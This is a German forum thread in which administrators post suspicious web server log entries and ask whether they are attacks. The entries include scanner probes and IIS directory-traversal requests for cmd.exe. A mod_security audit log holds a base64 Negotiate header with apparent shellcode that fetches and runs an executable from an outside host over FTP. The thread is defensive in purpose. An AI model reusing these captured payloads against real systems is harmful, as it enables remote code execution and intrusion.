Versuchte Angriffe?

[Indianer]

Hallo,

in meiner httpd finde ich folgende Einträge:

66.249.65.103 - - [14/Sep/2006:14:04:52 +0200] "\x80%\x01\x03\x01" 200 0 "-" " -"
66.249.65.103 - - [15/Sep/2006:01:25:47 +0200] "\x80%\x01\x03\x01" 200 0 "-" " -"
66.249.65.103 - - [16/Sep/2006:07:10:59 +0200] "\x80%\x01\x03\x01" 200 0 "-" " -"
205.188.xxx.20 - - [17/Sep/2006:00:25:31 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 410 "-" " -"
66.249.65.103 - - [17/Sep/2006:00:56:52 +0200] "\x80%\x01\x03\x01" 200 0 "-" " -"
66.234.170.244 - - [18/Sep/2006:02:36:40 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 410 "-" " -"
66.249.65.103 - - [18/Sep/2006:12:23:31 +0200] "\x80%\x01\x03\x01" 200 0 "-" " -"
66.249.66.176 - - [19/Sep/2006:14:02:46 +0200] "\x80%\x01\x03\x01" 200 0 "-" " -"
66.216.97.36 - - [22/Sep/2006:04:37:43 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 410 "-" " -"

Mir kommt der einfach zu regelmässig wieder. Sind dies versuchte Angriffe?

Grüsse Indianer

 

[Tobster]

Wäre schön wenn du das in einem Code-Block postest, dann könnte man es besser lesen.

Deine Frage stößt so gesehen eine Grundsatzdiskussion an. Wenn ich bei dir am Auto gucke ob die Tür verschlossen ist, ist es dann ein Einbruchsveruch?
Es guck halt jemand ob die Tür zu ist.

 

[mic]

Habs auch gefunden

2006-11-14 15:00:28 212.241.200.81 4005 xyz.xyz.xyz.xyz 80 HTTP/1.1 GET /w00tw00t.at.ISC.SANS.DFind:) 400 - Hostname -

Das SSF ist Fundstelle Nr. 1 bei google

hihi:

2006-10-23 15:44:06 218.92.93.146 3833 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir 400 - URL -
2006-10-23 15:44:08 218.92.93.146 4014 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 400 - URL -
2006-10-23 15:44:20 218.92.93.146 1545 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir 400 - URL -
2006-10-23 15:44:21 218.92.93.146 1738 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 400 - URL -
2006-10-23 15:44:26 218.92.93.146 2259 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/../../../../../winnt/system32/cmd.exe?/c+dir 403 - Forbidden -
2006-10-23 15:44:27 218.92.93.146 2437 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/../../cmd.exe?/c+dir 403 - Forbidden -
2006-10-23 15:44:29 218.92.93.146 2596 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/../../winnt/system32/cmd.exe?/c+dir 403 - Forbidden -
2006-10-23 15:44:35 218.92.93.146 3292 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/../../../../../winnt/system32/cmd.exe?/c+dir 403 - Forbidden -
2006-10-23 15:44:36 218.92.93.146 3458 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/../../cmd.exe?/c+dir 403 - Forbidden -
2006-10-23 15:44:38 218.92.93.146 3652 xyz.xyz.xyz.xyz 80 HTTP/0.9 GET /scripts/../../winnt/system32/cmd.exe?/c+dir 403 - Forbidden -

 

[ClemensBW]

Ist der ISS jetzt etwa unsicher?

 

[h00ch]

Ist der ISS jetzt etwa unsicher?

Die Internationale Raumstation? Ich hoffe nicht.

 

[ClemensBW]

*den IIS meint*

 

[h00ch]

Ist der ISS jetzt etwa unsicher?

*den IIS meint*

Die neuste Version ist auch nicht unsicherer als die neuste Apache Version.
Nichts ist 100% sicher. Es ist aber, nach meiner Erfahrung, in 99% der Admin, der das System unsicher macht.
Wie?

- Linux installieren und denken die Mailing Liste ist eh nur Spam
- phpmyadmin installieren und denken die Mailing Liste ist eh nur Spam
- PHP konfigurieren wie es die 08/15 Skripte brauchen
- Den IIS einsetzen, weil man von Linux keine Ahnung hat...
- In Foren rumtrollen und nur Offtopics lesen (wie ich gerade )

Die Frage solltest du nie wieder stellen. Sie ist schlichtweg sinnlos.
Sicherheitslücken werden immer erst in der Zukunft entdeckt. Und für alte gibt es Patches. Naja meistens...

 

[Eagle1]

Ich wollte keinen neuen Fred aufmachen, bei mir ist seit Wochen sowas im Log, stundenlang, ich habe täglich Megabyte große Logs.

a) was soll das werden?
b) kann man so eine IP nicht automatisch nach x-versuchen sperren?

HTTP/1.0 404 Not Found
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Wed, 29 Nov 2006 14:46:01 GMT
Vary: accept-language, accept-charset
========================================
Request from: 195.225.xxx.xxx - - [30/Nov/2006:10:05:52 +0100] "GET / HTTP/1.0" 404 1153
Handler: type-map
----------------------------------------
GET / HTTP/1.0
Host: www.meine-seite.tld.
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvayBlY2hvIG9wZW4gMTk1LjIyNS4xMTEuNzYgMzAwNjkgPiBvJmVjaG8gdXNlciAxIDEgPj4gbyAmZWNobyBnZXQgd3Vsb2dpbi5leGUgPj4gbyAmZWNobyBxdWl0ID4+IG8gJmZ0cCAtbiAtczpvICZkZWwgL0YgL1EgbyAmd3Vsb2dpbi5leGUNCgBCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQiMKAwgA+A8BAPgPASOCCDkDggQRAENDQ0Mg8P1/U1ZXZoHsgACJ5ujtAAAA/zZoCRLWY+j3AAAAiUYI6KIAAAD/dgRoa9AryujiAAAAiUYM6D8AAAD/dgRo+pcCTOjNAAAAMdtoEAQAAFP/0InDVot2EInHuRAEAADzpF4xwFBQUFNQUP9WDItGCGaBxIAAX15b/+Bg6CMAAACLRCQMjVh8g0M8BYFDKAAQAACBYygA8P//iwQkg8QUUDHAwzHSZP8yZIkiMdu4kEKQQjHJsQKJ3/OvdAND6/OJfhBkjwJYYcNgvyDw/X+LH4tGCIkHi3/4gcd4AQAAifk5GXQEiwnr+In6OVoEdAWLUgTr9okRiUoExkP9AWHDoQzw/X+LQByLWAiJHosAi0AIiUYEw2CLbCQoi0U8i1QFeAHqi0oYi1ogAevjOEmLNIsB7jH/McD8rDjgdAfBzw0Bx+v0O3wkJHXhi1okAetmiwxLi1ocAeuLBIsB6IlEJBxhwggA6/5DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDI4IEIAMJAOsGkJCQkJCQA4IEEQBERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE==
mod_security-message: Access denied with code 404

Danke Gruß R.

 

[Guin]

Das was du da postest sieht nach dem audit Log von mod_security1 aus. Wenn du keien false positives hast, schalte audit Log ab.